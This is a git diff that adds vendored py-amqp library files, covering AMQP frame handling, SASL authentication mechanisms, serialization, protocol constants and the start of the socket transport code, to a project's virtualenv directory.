+FRAME_OVERHEAD = 40 + + +def frame_handler(connection, callback, + unpack_from=unpack_from, content_methods=_CONTENT_METHODS): + """Create closure that reads frames.""" + expected_types = defaultdict(lambda: 1) + partial_messages = {} + + def on_frame(frame): + frame_type, channel, buf = frame + connection.bytes_recv += 1 + if frame_type not in (expected_types[channel], 8): + raise UnexpectedFrame( + 'Received frame {} while expecting type: {}'.format( + frame_type, expected_types[channel]), + ) + elif frame_type == 1: + method_sig = unpack_from('>HH', buf, 0) + + if method_sig in content_methods: + # Save what we've got so far and wait for the content-header + partial_messages[channel] = Message( + frame_method=method_sig, frame_args=buf, + ) + expected_types[channel] = 2 + return False + + callback(channel, method_sig, buf, None) + + elif frame_type == 2: + msg = partial_messages[channel] + msg.inbound_header(buf) + + if not msg.ready: + # wait for the content-body + expected_types[channel] = 3 + return False + + # bodyless message, we're done + expected_types[channel] = 1 + partial_messages.pop(channel, None) + callback(channel, msg.frame_method, msg.frame_args, msg) + + elif frame_type == 3: + msg = partial_messages[channel] + msg.inbound_body(buf) + if not msg.ready: + # wait for the rest of the content-body + return False + expected_types[channel] = 1 + partial_messages.pop(channel, None) + callback(channel, msg.frame_method, msg.frame_args, msg) + elif frame_type == 8: + # bytes_recv already updated + return False + return True + + return on_frame + + +class Buffer: + def __init__(self, buf): + self.buf = buf + + @property + def buf(self): + return self._buf + + @buf.setter + def buf(self, buf): + self._buf = buf + # Using a memoryview allows slicing without copying underlying data. + # Slicing this is much faster than slicing the bytearray directly. 
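+ # For example, memoryview(bytearray(b'abcdef'))[2:4] gives a view of
+ # b'cd' that shares the original storage instead of copying it.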
+ # More details: https://stackoverflow.com/a/34257357 + self.view = memoryview(buf) + + +def frame_writer(connection, transport, + pack=pack, pack_into=pack_into, range=range, len=len, + bytes=bytes, str_to_bytes=str_to_bytes, text_t=str): + """Create closure that writes frames.""" + write = transport.write + + buffer_store = Buffer(bytearray(connection.frame_max - 8)) + + def write_frame(type_, channel, method_sig, args, content): + chunk_size = connection.frame_max - 8 + offset = 0 + properties = None + args = str_to_bytes(args) + if content: + body = content.body + if isinstance(body, str): + encoding = content.properties.setdefault( + 'content_encoding', 'utf-8') + body = body.encode(encoding) + properties = content._serialize_properties() + bodylen = len(body) + properties_len = len(properties) or 0 + framelen = len(args) + properties_len + bodylen + FRAME_OVERHEAD + bigbody = framelen > chunk_size + else: + body, bodylen, bigbody = None, 0, 0 + + if bigbody: + # ## SLOW: string copy and write for every frame + frame = (b''.join([pack('>HH', *method_sig), args]) + if type_ == 1 else b'') # encode method frame + framelen = len(frame) + write(pack('>BHI%dsB' % framelen, + type_, channel, framelen, frame, 0xce)) + if body: + frame = b''.join([ + pack('>HHQ', method_sig[0], 0, len(body)), + properties, + ]) + framelen = len(frame) + write(pack('>BHI%dsB' % framelen, + 2, channel, framelen, frame, 0xce)) + + for i in range(0, bodylen, chunk_size): + frame = body[i:i + chunk_size] + framelen = len(frame) + write(pack('>BHI%dsB' % framelen, + 3, channel, framelen, + frame, 0xce)) + + else: + # frame_max can be updated via connection._on_tune. If + # it became larger, then we need to resize the buffer + # to prevent overflow. + if chunk_size > len(buffer_store.buf): + buffer_store.buf = bytearray(chunk_size) + buf = buffer_store.buf + + # ## FAST: pack into buffer and single write + frame = (b''.join([pack('>HH', *method_sig), args]) + if type_ == 1 else b'') + framelen = len(frame) + pack_into('>BHI%dsB' % framelen, buf, offset, + type_, channel, framelen, frame, 0xce) + offset += 8 + framelen + if body is not None: + frame = b''.join([ + pack('>HHQ', method_sig[0], 0, len(body)), + properties, + ]) + framelen = len(frame) + + pack_into('>BHI%dsB' % framelen, buf, offset, + 2, channel, framelen, frame, 0xce) + offset += 8 + framelen + + bodylen = len(body) + if bodylen > 0: + framelen = bodylen + pack_into('>BHI%dsB' % framelen, buf, offset, + 3, channel, framelen, body, 0xce) + offset += 8 + framelen + + write(buffer_store.view[:offset]) + + connection.bytes_sent += 1 + return write_frame diff --git a/env/Lib/site-packages/amqp/platform.py b/env/Lib/site-packages/amqp/platform.py new file mode 100644 index 00000000..6f6c6f3d --- /dev/null +++ b/env/Lib/site-packages/amqp/platform.py @@ -0,0 +1,79 @@ +"""Platform compatibility.""" + +import platform +import re +import sys +# Jython does not have this attribute +import typing + +try: + from socket import SOL_TCP +except ImportError: # pragma: no cover + from socket import IPPROTO_TCP as SOL_TCP # noqa + + +RE_NUM = re.compile(r'(\d+).+') + + +def _linux_version_to_tuple(s: str) -> typing.Tuple[int, int, int]: + return tuple(map(_versionatom, s.split('.')[:3])) + + +def _versionatom(s: str) -> int: + if s.isdigit(): + return int(s) + match = RE_NUM.match(s) + return int(match.groups()[0]) if match else 0 + + +# available socket options for TCP level +KNOWN_TCP_OPTS = { + 'TCP_CORK', 'TCP_DEFER_ACCEPT', 'TCP_KEEPCNT', + 'TCP_KEEPIDLE', 
'TCP_KEEPINTVL', 'TCP_LINGER2', + 'TCP_MAXSEG', 'TCP_NODELAY', 'TCP_QUICKACK', + 'TCP_SYNCNT', 'TCP_USER_TIMEOUT', 'TCP_WINDOW_CLAMP', +} + +LINUX_VERSION = None +if sys.platform.startswith('linux'): + LINUX_VERSION = _linux_version_to_tuple(platform.release()) + if LINUX_VERSION < (2, 6, 37): + KNOWN_TCP_OPTS.remove('TCP_USER_TIMEOUT') + + # Windows Subsystem for Linux is an edge-case: the Python socket library + # returns most TCP_* enums, but they aren't actually supported + if platform.release().endswith("Microsoft"): + KNOWN_TCP_OPTS = {'TCP_NODELAY', 'TCP_KEEPIDLE', 'TCP_KEEPINTVL', + 'TCP_KEEPCNT'} + +elif sys.platform.startswith('darwin'): + KNOWN_TCP_OPTS.remove('TCP_USER_TIMEOUT') + +elif 'bsd' in sys.platform: + KNOWN_TCP_OPTS.remove('TCP_USER_TIMEOUT') + +# According to MSDN Windows platforms support getsockopt(TCP_MAXSSEG) but not +# setsockopt(TCP_MAXSEG) on IPPROTO_TCP sockets. +elif sys.platform.startswith('win'): + KNOWN_TCP_OPTS = {'TCP_NODELAY'} + +elif sys.platform.startswith('cygwin'): + KNOWN_TCP_OPTS = {'TCP_NODELAY'} + + # illumos does not allow to set the TCP_MAXSEG socket option, + # even if the Oracle documentation says otherwise. + # TCP_USER_TIMEOUT does not exist on Solaris 11.4 +elif sys.platform.startswith('sunos'): + KNOWN_TCP_OPTS.remove('TCP_MAXSEG') + KNOWN_TCP_OPTS.remove('TCP_USER_TIMEOUT') + +# aix does not allow to set the TCP_MAXSEG +# or the TCP_USER_TIMEOUT socket options. +elif sys.platform.startswith('aix'): + KNOWN_TCP_OPTS.remove('TCP_MAXSEG') + KNOWN_TCP_OPTS.remove('TCP_USER_TIMEOUT') +__all__ = ( + 'LINUX_VERSION', + 'SOL_TCP', + 'KNOWN_TCP_OPTS', +) diff --git a/env/Lib/site-packages/amqp/protocol.py b/env/Lib/site-packages/amqp/protocol.py new file mode 100644 index 00000000..b58d5c96 --- /dev/null +++ b/env/Lib/site-packages/amqp/protocol.py @@ -0,0 +1,12 @@ +"""Protocol data.""" + +from collections import namedtuple + +queue_declare_ok_t = namedtuple( + 'queue_declare_ok_t', ('queue', 'message_count', 'consumer_count'), +) + +basic_return_t = namedtuple( + 'basic_return_t', + ('reply_code', 'reply_text', 'exchange', 'routing_key', 'message'), +) diff --git a/env/Lib/site-packages/amqp/sasl.py b/env/Lib/site-packages/amqp/sasl.py new file mode 100644 index 00000000..407ccb8e --- /dev/null +++ b/env/Lib/site-packages/amqp/sasl.py @@ -0,0 +1,191 @@ +"""SASL mechanisms for AMQP authentication.""" + +import socket +import warnings +from io import BytesIO + +from amqp.serialization import _write_table + + +class SASL: + """The base class for all amqp SASL authentication mechanisms. + + You should sub-class this if you're implementing your own authentication. + """ + + @property + def mechanism(self): + """Return a bytes containing the SASL mechanism name.""" + raise NotImplementedError + + def start(self, connection): + """Return the first response to a SASL challenge as a bytes object.""" + raise NotImplementedError + + +class PLAIN(SASL): + """PLAIN SASL authentication mechanism. 
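+
+ PLAIN transmits the username and password essentially in clear text,
+ so it is normally used together with TLS. Illustrative usage (host and
+ credentials are placeholders)::
+
+ from amqp import Connection
+ conn = Connection('broker.example.com:5671', ssl=True,
+ authentication=(PLAIN('guest', 'guest'),))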
+ + See https://tools.ietf.org/html/rfc4616 for details + """ + + mechanism = b'PLAIN' + + def __init__(self, username, password): + self.username, self.password = username, password + + __slots__ = ( + "username", + "password", + ) + + def start(self, connection): + if self.username is None or self.password is None: + return NotImplemented + login_response = BytesIO() + login_response.write(b'\0') + login_response.write(self.username.encode('utf-8')) + login_response.write(b'\0') + login_response.write(self.password.encode('utf-8')) + return login_response.getvalue() + + +class AMQPLAIN(SASL): + """AMQPLAIN SASL authentication mechanism. + + This is a non-standard mechanism used by AMQP servers. + """ + + mechanism = b'AMQPLAIN' + + def __init__(self, username, password): + self.username, self.password = username, password + + __slots__ = ( + "username", + "password", + ) + + def start(self, connection): + if self.username is None or self.password is None: + return NotImplemented + login_response = BytesIO() + _write_table({b'LOGIN': self.username, b'PASSWORD': self.password}, + login_response.write, []) + # Skip the length at the beginning + return login_response.getvalue()[4:] + + +def _get_gssapi_mechanism(): + try: + import gssapi + import gssapi.raw.misc # Fail if the old python-gssapi is installed + except ImportError: + class FakeGSSAPI(SASL): + """A no-op SASL mechanism for when gssapi isn't available.""" + + mechanism = None + + def __init__(self, client_name=None, service=b'amqp', + rdns=False, fail_soft=False): + if not fail_soft: + raise NotImplementedError( + "You need to install the `gssapi` module for GSSAPI " + "SASL support") + + def start(self): # pragma: no cover + return NotImplemented + return FakeGSSAPI + else: + class GSSAPI(SASL): + """GSSAPI SASL authentication mechanism. + + See https://tools.ietf.org/html/rfc4752 for details + """ + + mechanism = b'GSSAPI' + + def __init__(self, client_name=None, service=b'amqp', + rdns=False, fail_soft=False): + if client_name and not isinstance(client_name, bytes): + client_name = client_name.encode('ascii') + self.client_name = client_name + self.fail_soft = fail_soft + self.service = service + self.rdns = rdns + + __slots__ = ( + "client_name", + "fail_soft", + "service", + "rdns" + ) + + def get_hostname(self, connection): + sock = connection.transport.sock + if self.rdns and sock.family in (socket.AF_INET, + socket.AF_INET6): + peer = sock.getpeername() + hostname, _, _ = socket.gethostbyaddr(peer[0]) + else: + hostname = connection.transport.host + if not isinstance(hostname, bytes): + hostname = hostname.encode('ascii') + return hostname + + def start(self, connection): + try: + if self.client_name: + creds = gssapi.Credentials( + name=gssapi.Name(self.client_name)) + else: + creds = None + hostname = self.get_hostname(connection) + name = gssapi.Name(b'@'.join([self.service, hostname]), + gssapi.NameType.hostbased_service) + context = gssapi.SecurityContext(name=name, creds=creds) + return context.step(None) + except gssapi.raw.misc.GSSError: + if self.fail_soft: + return NotImplemented + else: + raise + return GSSAPI + + +GSSAPI = _get_gssapi_mechanism() + + +class EXTERNAL(SASL): + """EXTERNAL SASL mechanism. + + Enables external authentication, i.e. not handled through this protocol. + Only passes 'EXTERNAL' as authentication mechanism, but no further + authentication data. + """ + + mechanism = b'EXTERNAL' + + def start(self, connection): + return b'' + + +class RAW(SASL): + """A generic custom SASL mechanism. 
+ + This mechanism takes a mechanism name and response to send to the server, + so can be used for simple custom authentication schemes. + """ + + mechanism = None + + def __init__(self, mechanism, response): + assert isinstance(mechanism, bytes) + assert isinstance(response, bytes) + self.mechanism, self.response = mechanism, response + warnings.warn("Passing login_method and login_response to Connection " + "is deprecated. Please implement a SASL subclass " + "instead.", DeprecationWarning) + + def start(self, connection): + return self.response diff --git a/env/Lib/site-packages/amqp/serialization.py b/env/Lib/site-packages/amqp/serialization.py new file mode 100644 index 00000000..1f2f8e2d --- /dev/null +++ b/env/Lib/site-packages/amqp/serialization.py @@ -0,0 +1,582 @@ +"""Convert between bytestreams and higher-level AMQP types. + +2007-11-05 Barry Pederson + +""" +# Copyright (C) 2007 Barry Pederson + +import calendar +from datetime import datetime +from decimal import Decimal +from io import BytesIO +from struct import pack, unpack_from + +from .exceptions import FrameSyntaxError +from .spec import Basic +from .utils import bytes_to_str as pstr_t +from .utils import str_to_bytes + +ILLEGAL_TABLE_TYPE = """\ + Table type {0!r} not handled by amqp. +""" + +ILLEGAL_TABLE_TYPE_WITH_KEY = """\ +Table type {0!r} for key {1!r} not handled by amqp. [value: {2!r}] +""" + +ILLEGAL_TABLE_TYPE_WITH_VALUE = """\ + Table type {0!r} not handled by amqp. [value: {1!r}] +""" + + +def _read_item(buf, offset): + ftype = chr(buf[offset]) + offset += 1 + + # 'S': long string + if ftype == 'S': + slen, = unpack_from('>I', buf, offset) + offset += 4 + try: + val = pstr_t(buf[offset:offset + slen]) + except UnicodeDecodeError: + val = buf[offset:offset + slen] + + offset += slen + # 's': short string + elif ftype == 's': + slen, = unpack_from('>B', buf, offset) + offset += 1 + val = pstr_t(buf[offset:offset + slen]) + offset += slen + # 'x': Bytes Array + elif ftype == 'x': + blen, = unpack_from('>I', buf, offset) + offset += 4 + val = buf[offset:offset + blen] + offset += blen + # 'b': short-short int + elif ftype == 'b': + val, = unpack_from('>B', buf, offset) + offset += 1 + # 'B': short-short unsigned int + elif ftype == 'B': + val, = unpack_from('>b', buf, offset) + offset += 1 + # 'U': short int + elif ftype == 'U': + val, = unpack_from('>h', buf, offset) + offset += 2 + # 'u': short unsigned int + elif ftype == 'u': + val, = unpack_from('>H', buf, offset) + offset += 2 + # 'I': long int + elif ftype == 'I': + val, = unpack_from('>i', buf, offset) + offset += 4 + # 'i': long unsigned int + elif ftype == 'i': + val, = unpack_from('>I', buf, offset) + offset += 4 + # 'L': long long int + elif ftype == 'L': + val, = unpack_from('>q', buf, offset) + offset += 8 + # 'l': long long unsigned int + elif ftype == 'l': + val, = unpack_from('>Q', buf, offset) + offset += 8 + # 'f': float + elif ftype == 'f': + val, = unpack_from('>f', buf, offset) + offset += 4 + # 'd': double + elif ftype == 'd': + val, = unpack_from('>d', buf, offset) + offset += 8 + # 'D': decimal + elif ftype == 'D': + d, = unpack_from('>B', buf, offset) + offset += 1 + n, = unpack_from('>i', buf, offset) + offset += 4 + val = Decimal(n) / Decimal(10 ** d) + # 'F': table + elif ftype == 'F': + tlen, = unpack_from('>I', buf, offset) + offset += 4 + limit = offset + tlen + val = {} + while offset < limit: + keylen, = unpack_from('>B', buf, offset) + offset += 1 + key = pstr_t(buf[offset:offset + keylen]) + offset += keylen + val[key], offset 
= _read_item(buf, offset) + # 'A': array + elif ftype == 'A': + alen, = unpack_from('>I', buf, offset) + offset += 4 + limit = offset + alen + val = [] + while offset < limit: + v, offset = _read_item(buf, offset) + val.append(v) + # 't' (bool) + elif ftype == 't': + val, = unpack_from('>B', buf, offset) + val = bool(val) + offset += 1 + # 'T': timestamp + elif ftype == 'T': + val, = unpack_from('>Q', buf, offset) + offset += 8 + val = datetime.utcfromtimestamp(val) + # 'V': void + elif ftype == 'V': + val = None + else: + raise FrameSyntaxError( + 'Unknown value in table: {!r} ({!r})'.format( + ftype, type(ftype))) + return val, offset + + +def loads(format, buf, offset): + """Deserialize amqp format. + + bit = b + octet = o + short = B + long = l + long long = L + float = f + shortstr = s + longstr = S + table = F + array = A + timestamp = T + """ + bitcount = bits = 0 + + values = [] + append = values.append + format = pstr_t(format) + + for p in format: + if p == 'b': + if not bitcount: + bits = ord(buf[offset:offset + 1]) + offset += 1 + bitcount = 8 + val = (bits & 1) == 1 + bits >>= 1 + bitcount -= 1 + elif p == 'o': + bitcount = bits = 0 + val, = unpack_from('>B', buf, offset) + offset += 1 + elif p == 'B': + bitcount = bits = 0 + val, = unpack_from('>H', buf, offset) + offset += 2 + elif p == 'l': + bitcount = bits = 0 + val, = unpack_from('>I', buf, offset) + offset += 4 + elif p == 'L': + bitcount = bits = 0 + val, = unpack_from('>Q', buf, offset) + offset += 8 + elif p == 'f': + bitcount = bits = 0 + val, = unpack_from('>f', buf, offset) + offset += 4 + elif p == 's': + bitcount = bits = 0 + slen, = unpack_from('B', buf, offset) + offset += 1 + val = buf[offset:offset + slen].decode('utf-8', 'surrogatepass') + offset += slen + elif p == 'S': + bitcount = bits = 0 + slen, = unpack_from('>I', buf, offset) + offset += 4 + val = buf[offset:offset + slen].decode('utf-8', 'surrogatepass') + offset += slen + elif p == 'x': + blen, = unpack_from('>I', buf, offset) + offset += 4 + val = buf[offset:offset + blen] + offset += blen + elif p == 'F': + bitcount = bits = 0 + tlen, = unpack_from('>I', buf, offset) + offset += 4 + limit = offset + tlen + val = {} + while offset < limit: + keylen, = unpack_from('>B', buf, offset) + offset += 1 + key = pstr_t(buf[offset:offset + keylen]) + offset += keylen + val[key], offset = _read_item(buf, offset) + elif p == 'A': + bitcount = bits = 0 + alen, = unpack_from('>I', buf, offset) + offset += 4 + limit = offset + alen + val = [] + while offset < limit: + aval, offset = _read_item(buf, offset) + val.append(aval) + elif p == 'T': + bitcount = bits = 0 + val, = unpack_from('>Q', buf, offset) + offset += 8 + val = datetime.utcfromtimestamp(val) + else: + raise FrameSyntaxError(ILLEGAL_TABLE_TYPE.format(p)) + append(val) + return values, offset + + +def _flushbits(bits, write): + if bits: + write(pack('B' * len(bits), *bits)) + bits[:] = [] + return 0 + + +def dumps(format, values): + """Serialize AMQP arguments. 
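+
+ Illustrative example (the format codes are listed under Notes below):
+ dumps('Bs', (0, 'amq.direct')) packs one short integer followed by one
+ shortstr into a single bytes payload.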
+ + Notes: + bit = b + octet = o + short = B + long = l + long long = L + shortstr = s + longstr = S + byte array = x + table = F + array = A + """ + bitcount = 0 + bits = [] + out = BytesIO() + write = out.write + + format = pstr_t(format) + + for i, val in enumerate(values): + p = format[i] + if p == 'b': + val = 1 if val else 0 + shift = bitcount % 8 + if shift == 0: + bits.append(0) + bits[-1] |= (val << shift) + bitcount += 1 + elif p == 'o': + bitcount = _flushbits(bits, write) + write(pack('B', val)) + elif p == 'B': + bitcount = _flushbits(bits, write) + write(pack('>H', int(val))) + elif p == 'l': + bitcount = _flushbits(bits, write) + write(pack('>I', val)) + elif p == 'L': + bitcount = _flushbits(bits, write) + write(pack('>Q', val)) + elif p == 'f': + bitcount = _flushbits(bits, write) + write(pack('>f', val)) + elif p == 's': + val = val or '' + bitcount = _flushbits(bits, write) + if isinstance(val, str): + val = val.encode('utf-8', 'surrogatepass') + write(pack('B', len(val))) + write(val) + elif p == 'S' or p == 'x': + val = val or '' + bitcount = _flushbits(bits, write) + if isinstance(val, str): + val = val.encode('utf-8', 'surrogatepass') + write(pack('>I', len(val))) + write(val) + elif p == 'F': + bitcount = _flushbits(bits, write) + _write_table(val or {}, write, bits) + elif p == 'A': + bitcount = _flushbits(bits, write) + _write_array(val or [], write, bits) + elif p == 'T': + write(pack('>Q', int(calendar.timegm(val.utctimetuple())))) + _flushbits(bits, write) + + return out.getvalue() + + +def _write_table(d, write, bits): + out = BytesIO() + twrite = out.write + for k, v in d.items(): + if isinstance(k, str): + k = k.encode('utf-8', 'surrogatepass') + twrite(pack('B', len(k))) + twrite(k) + try: + _write_item(v, twrite, bits) + except ValueError: + raise FrameSyntaxError( + ILLEGAL_TABLE_TYPE_WITH_KEY.format(type(v), k, v)) + table_data = out.getvalue() + write(pack('>I', len(table_data))) + write(table_data) + + +def _write_array(list_, write, bits): + out = BytesIO() + awrite = out.write + for v in list_: + try: + _write_item(v, awrite, bits) + except ValueError: + raise FrameSyntaxError( + ILLEGAL_TABLE_TYPE_WITH_VALUE.format(type(v), v)) + array_data = out.getvalue() + write(pack('>I', len(array_data))) + write(array_data) + + +def _write_item(v, write, bits): + if isinstance(v, (str, bytes)): + if isinstance(v, str): + v = v.encode('utf-8', 'surrogatepass') + write(pack('>cI', b'S', len(v))) + write(v) + elif isinstance(v, bool): + write(pack('>cB', b't', int(v))) + elif isinstance(v, float): + write(pack('>cd', b'd', v)) + elif isinstance(v, int): + if v > 2147483647 or v < -2147483647: + write(pack('>cq', b'L', v)) + else: + write(pack('>ci', b'I', v)) + elif isinstance(v, Decimal): + sign, digits, exponent = v.as_tuple() + v = 0 + for d in digits: + v = (v * 10) + d + if sign: + v = -v + write(pack('>cBi', b'D', -exponent, v)) + elif isinstance(v, datetime): + write( + pack('>cQ', b'T', int(calendar.timegm(v.utctimetuple())))) + elif isinstance(v, dict): + write(b'F') + _write_table(v, write, bits) + elif isinstance(v, (list, tuple)): + write(b'A') + _write_array(v, write, bits) + elif v is None: + write(b'V') + else: + raise ValueError() + + +def decode_properties_basic(buf, offset): + """Decode basic properties.""" + properties = {} + + flags, = unpack_from('>H', buf, offset) + offset += 2 + + if flags & 0x8000: + slen, = unpack_from('>B', buf, offset) + offset += 1 + properties['content_type'] = pstr_t(buf[offset:offset + slen]) + offset += slen + if 
flags & 0x4000: + slen, = unpack_from('>B', buf, offset) + offset += 1 + properties['content_encoding'] = pstr_t(buf[offset:offset + slen]) + offset += slen + if flags & 0x2000: + _f, offset = loads('F', buf, offset) + properties['application_headers'], = _f + if flags & 0x1000: + properties['delivery_mode'], = unpack_from('>B', buf, offset) + offset += 1 + if flags & 0x0800: + properties['priority'], = unpack_from('>B', buf, offset) + offset += 1 + if flags & 0x0400: + slen, = unpack_from('>B', buf, offset) + offset += 1 + properties['correlation_id'] = pstr_t(buf[offset:offset + slen]) + offset += slen + if flags & 0x0200: + slen, = unpack_from('>B', buf, offset) + offset += 1 + properties['reply_to'] = pstr_t(buf[offset:offset + slen]) + offset += slen + if flags & 0x0100: + slen, = unpack_from('>B', buf, offset) + offset += 1 + properties['expiration'] = pstr_t(buf[offset:offset + slen]) + offset += slen + if flags & 0x0080: + slen, = unpack_from('>B', buf, offset) + offset += 1 + properties['message_id'] = pstr_t(buf[offset:offset + slen]) + offset += slen + if flags & 0x0040: + properties['timestamp'], = unpack_from('>Q', buf, offset) + offset += 8 + if flags & 0x0020: + slen, = unpack_from('>B', buf, offset) + offset += 1 + properties['type'] = pstr_t(buf[offset:offset + slen]) + offset += slen + if flags & 0x0010: + slen, = unpack_from('>B', buf, offset) + offset += 1 + properties['user_id'] = pstr_t(buf[offset:offset + slen]) + offset += slen + if flags & 0x0008: + slen, = unpack_from('>B', buf, offset) + offset += 1 + properties['app_id'] = pstr_t(buf[offset:offset + slen]) + offset += slen + if flags & 0x0004: + slen, = unpack_from('>B', buf, offset) + offset += 1 + properties['cluster_id'] = pstr_t(buf[offset:offset + slen]) + offset += slen + return properties, offset + + +PROPERTY_CLASSES = { + Basic.CLASS_ID: decode_properties_basic, +} + + +class GenericContent: + """Abstract base class for AMQP content. + + Subclasses should override the PROPERTIES attribute. + """ + + CLASS_ID = None + PROPERTIES = [('dummy', 's')] + + def __init__(self, frame_method=None, frame_args=None, **props): + self.frame_method = frame_method + self.frame_args = frame_args + + self.properties = props + self._pending_chunks = [] + self.body_received = 0 + self.body_size = 0 + self.ready = False + + __slots__ = ( + "frame_method", + "frame_args", + "properties", + "_pending_chunks", + "body_received", + "body_size", + "ready", + # adding '__dict__' to get dynamic assignment + "__dict__", + "__weakref__", + ) + + def __getattr__(self, name): + # Look for additional properties in the 'properties' + # dictionary, and if present - the 'delivery_info' dictionary. + if name == '__setstate__': + # Allows pickling/unpickling to work + raise AttributeError('__setstate__') + + if name in self.properties: + return self.properties[name] + raise AttributeError(name) + + def _load_properties(self, class_id, buf, offset): + """Load AMQP properties. + + Given the raw bytes containing the property-flags and property-list + from a content-frame-header, parse and insert into a dictionary + stored in this object as an attribute named 'properties'. + """ + # Read 16-bit shorts until we get one with a low bit set to zero + props, offset = PROPERTY_CLASSES[class_id](buf, offset) + self.properties = props + return offset + + def _serialize_properties(self): + """Serialize AMQP properties. 
+ + Serialize the 'properties' attribute (a dictionary) into + the raw bytes making up a set of property flags and a + property list, suitable for putting into a content frame header. + """ + shift = 15 + flag_bits = 0 + flags = [] + sformat, svalues = [], [] + props = self.properties + for key, proptype in self.PROPERTIES: + val = props.get(key, None) + if val is not None: + if shift == 0: + flags.append(flag_bits) + flag_bits = 0 + shift = 15 + + flag_bits |= (1 << shift) + if proptype != 'bit': + sformat.append(str_to_bytes(proptype)) + svalues.append(val) + + shift -= 1 + flags.append(flag_bits) + result = BytesIO() + write = result.write + for flag_bits in flags: + write(pack('>H', flag_bits)) + write(dumps(b''.join(sformat), svalues)) + + return result.getvalue() + + def inbound_header(self, buf, offset=0): + class_id, self.body_size = unpack_from('>HxxQ', buf, offset) + offset += 12 + self._load_properties(class_id, buf, offset) + if not self.body_size: + self.ready = True + return offset + + def inbound_body(self, buf): + chunks = self._pending_chunks + self.body_received += len(buf) + if self.body_received >= self.body_size: + if chunks: + chunks.append(buf) + self.body = bytes().join(chunks) + chunks[:] = [] + else: + self.body = buf + self.ready = True + else: + chunks.append(buf) diff --git a/env/Lib/site-packages/amqp/spec.py b/env/Lib/site-packages/amqp/spec.py new file mode 100644 index 00000000..2a1169e1 --- /dev/null +++ b/env/Lib/site-packages/amqp/spec.py @@ -0,0 +1,121 @@ +"""AMQP Spec.""" + +from collections import namedtuple + +method_t = namedtuple('method_t', ('method_sig', 'args', 'content')) + + +def method(method_sig, args=None, content=False): + """Create amqp method specification tuple.""" + return method_t(method_sig, args, content) + + +class Connection: + """AMQ Connection class.""" + + CLASS_ID = 10 + + Start = (10, 10) + StartOk = (10, 11) + Secure = (10, 20) + SecureOk = (10, 21) + Tune = (10, 30) + TuneOk = (10, 31) + Open = (10, 40) + OpenOk = (10, 41) + Close = (10, 50) + CloseOk = (10, 51) + Blocked = (10, 60) + Unblocked = (10, 61) + + +class Channel: + """AMQ Channel class.""" + + CLASS_ID = 20 + + Open = (20, 10) + OpenOk = (20, 11) + Flow = (20, 20) + FlowOk = (20, 21) + Close = (20, 40) + CloseOk = (20, 41) + + +class Exchange: + """AMQ Exchange class.""" + + CLASS_ID = 40 + + Declare = (40, 10) + DeclareOk = (40, 11) + Delete = (40, 20) + DeleteOk = (40, 21) + Bind = (40, 30) + BindOk = (40, 31) + Unbind = (40, 40) + UnbindOk = (40, 51) + + +class Queue: + """AMQ Queue class.""" + + CLASS_ID = 50 + + Declare = (50, 10) + DeclareOk = (50, 11) + Bind = (50, 20) + BindOk = (50, 21) + Purge = (50, 30) + PurgeOk = (50, 31) + Delete = (50, 40) + DeleteOk = (50, 41) + Unbind = (50, 50) + UnbindOk = (50, 51) + + +class Basic: + """AMQ Basic class.""" + + CLASS_ID = 60 + + Qos = (60, 10) + QosOk = (60, 11) + Consume = (60, 20) + ConsumeOk = (60, 21) + Cancel = (60, 30) + CancelOk = (60, 31) + Publish = (60, 40) + Return = (60, 50) + Deliver = (60, 60) + Get = (60, 70) + GetOk = (60, 71) + GetEmpty = (60, 72) + Ack = (60, 80) + Nack = (60, 120) + Reject = (60, 90) + RecoverAsync = (60, 100) + Recover = (60, 110) + RecoverOk = (60, 111) + + +class Confirm: + """AMQ Confirm class.""" + + CLASS_ID = 85 + + Select = (85, 10) + SelectOk = (85, 11) + + +class Tx: + """AMQ Tx class.""" + + CLASS_ID = 90 + + Select = (90, 10) + SelectOk = (90, 11) + Commit = (90, 20) + CommitOk = (90, 21) + Rollback = (90, 30) + RollbackOk = (90, 31) diff --git 
a/env/Lib/site-packages/amqp/transport.py b/env/Lib/site-packages/amqp/transport.py new file mode 100644 index 00000000..2761f094 --- /dev/null +++ b/env/Lib/site-packages/amqp/transport.py @@ -0,0 +1,674 @@ +"""Transport implementation.""" +# Copyright (C) 2009 Barry Pederson + +import errno +import os +import re +import socket +import ssl +from contextlib import contextmanager +from ssl import SSLError +from struct import pack, unpack + +from .exceptions import UnexpectedFrame +from .platform import KNOWN_TCP_OPTS, SOL_TCP +from .utils import set_cloexec + +_UNAVAIL = {errno.EAGAIN, errno.EINTR, errno.ENOENT, errno.EWOULDBLOCK} + +AMQP_PORT = 5672 + +EMPTY_BUFFER = bytes() + +SIGNED_INT_MAX = 0x7FFFFFFF + +# Yes, Advanced Message Queuing Protocol Protocol is redundant +AMQP_PROTOCOL_HEADER = b'AMQP\x00\x00\x09\x01' + +# Match things like: [fe80::1]:5432, from RFC 2732 +IPV6_LITERAL = re.compile(r'\[([\.0-9a-f:]+)\](?::(\d+))?') + +DEFAULT_SOCKET_SETTINGS = { + 'TCP_NODELAY': 1, + 'TCP_USER_TIMEOUT': 1000, + 'TCP_KEEPIDLE': 60, + 'TCP_KEEPINTVL': 10, + 'TCP_KEEPCNT': 9, +} + + +def to_host_port(host, default=AMQP_PORT): + """Convert hostname:port string to host, port tuple.""" + port = default + m = IPV6_LITERAL.match(host) + if m: + host = m.group(1) + if m.group(2): + port = int(m.group(2)) + else: + if ':' in host: + host, port = host.rsplit(':', 1) + port = int(port) + return host, port + + +class _AbstractTransport: + """Common superclass for TCP and SSL transports. + + PARAMETERS: + host: str + + Broker address in format ``HOSTNAME:PORT``. + + connect_timeout: int + + Timeout of creating new connection. + + read_timeout: int + + sets ``SO_RCVTIMEO`` parameter of socket. + + write_timeout: int + + sets ``SO_SNDTIMEO`` parameter of socket. + + socket_settings: dict + + dictionary containing `optname` and ``optval`` passed to + ``setsockopt(2)``. + + raise_on_initial_eintr: bool + + when True, ``socket.timeout`` is raised + when exception is received during first read. See ``_read()`` for + details. + """ + + def __init__(self, host, connect_timeout=None, + read_timeout=None, write_timeout=None, + socket_settings=None, raise_on_initial_eintr=True, **kwargs): + self.connected = False + self.sock = None + self.raise_on_initial_eintr = raise_on_initial_eintr + self._read_buffer = EMPTY_BUFFER + self.host, self.port = to_host_port(host) + self.connect_timeout = connect_timeout + self.read_timeout = read_timeout + self.write_timeout = write_timeout + self.socket_settings = socket_settings + + __slots__ = ( + "connection", + "sock", + "raise_on_initial_eintr", + "_read_buffer", + "host", + "port", + "connect_timeout", + "read_timeout", + "write_timeout", + "socket_settings", + # adding '__dict__' to get dynamic assignment + "__dict__", + "__weakref__", + ) + + def __repr__(self): + if self.sock: + src = 